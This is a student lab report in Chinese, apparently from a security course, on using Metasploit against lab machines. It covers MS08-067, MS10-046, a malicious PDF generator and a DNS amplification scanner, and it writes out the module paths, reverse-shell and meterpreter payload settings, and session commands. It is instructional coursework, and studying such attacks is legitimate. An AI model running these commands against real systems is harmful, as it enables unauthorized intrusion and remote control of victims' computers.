20155220 Exp5 MSF基礎應用

Exp5 MSF基礎應用

一個主動攻擊實踐,MS08-067

  • 首先利用msfconsole啓用msf終端shell

  • 而後利用search MS08-067搜索漏洞,會顯示相應漏洞模塊windows

  • 根據上圖,咱們輸入use exploit/windows/smb/ms08_067_netapi,選擇相應的模塊api

  • 而後咱們可使用show payloads,查看可使用的模塊
    瀏覽器

  • 而後根據上圖,爲獲取靶機的shell,因此利用set payload generic/shell_reverse_tcp安全

  • 而後輸入show options,查看配置信息,知道咱們須要配置RHOST,LHOST,LPORT,target網絡

  • 輸入
set RHOST 192.168.241.138
set LHOST 192.168.241.134
set LPORT 5220

進行配置session

  • 而後咱們再次利用show options,查看配置信息
    tcp

  • 而後exploit進行監聽
    工具

針對瀏覽器的攻擊,ms10_046

  • 我選擇了ms10_046,首先輸入search ms10_046查找漏洞

  • 因爲咱們要對瀏覽器進行攻擊,因此咱們輸入use use exploit/windows/browser/ms10_046_shortcut_icon_學習

  • 而後咱們輸入show payloads,查看載荷進行選擇,這裏我仍用實驗一中的載荷set payload generic/shell_reverse_tcp

  • 咱們利用show options查詢須要配置的有,LPORT,LHOST,SRVHOST

  • 輸入
set SRVHOST 192.168.241.134
set LHOST 192.168.241.134
set LPORT 5220

進行配置

  • 再次查看配置信息

  • 而後輸入exploit生成URL,並在windows端訪問該URL,kali端如圖

  • 輸入sessions,可看到一個ID爲1的鏈接,而後輸入session -i 1,接入ID爲1的鏈接,輸入shell,獲取成功。
    如圖:

針對客戶端的攻擊

  • 首先仍是先利用search adobe進行搜索

  • 而後進行選擇,我選擇的是use windows/fileformat/adobe_flashplayer_button

  • 而後set payload windows/meterpreter/reverse_tcp,設置所用荷載,利用show options查看所要配置的信息

  • 輸入以下代碼,對LHOST,LPORT,FILENAME進行配置
set LHOST 192.168.241.134
set LPORT 5220
set FILENAME 20155220.pdf
  • 輸入exploit,生成20155220.pdf文件

•輸入use exploit/multi/handler,進入監聽,並設置監聽端口,主機號

  • 在windows端,打開20155220.pdf,

惋惜我本次回連並未成功,經反覆實驗依舊不能成功,緣由不詳。

輔助模塊應用

  • 首先利用show auxiliary,查看輔助模塊

  • 我選擇的是scanner/dns/dns_amp,掃描dns

  • 輸入show options,查看配置

  • 輸入exploit進行監聽

基礎問題

  • 用本身的話解釋什麼是exploit,payload,encode
    encode
    exploit至關於一種運載工具,payload至關於一種包裝工具,encode就是編碼器,就是對攻擊進行假裝。通俗來講,把exploit比做導彈車,payload就是導彈的外殼,encode就是裏面真正核心的東西。

實驗體會

經過本次實驗我對本身的電腦安全產生了很大的懷疑,我有好多補丁由於一些緣由都沒有安裝,說不定哪天碰巧碰到個沒安裝相應補丁的漏洞,那隻怕個人電腦就涼涼了。本次實驗仍是遇到了一些問題,在針對IE瀏覽器的攻擊時出現了挫折,但好在通過不斷嘗試,放棄了對IE8.0版本的攻擊。特別是本次針對客戶端攻擊的試驗中出現了回連不成功的狀況,在反覆重裝了數個xp後,我仍是放棄了這一步,但其中緣由仍是值得深究。隨着課程的學習,個人網絡安全意識提升了很多,本次至少學到了補丁的及時安裝,儘量避免病毒、木馬的入侵。

相關文章
相關標籤/搜索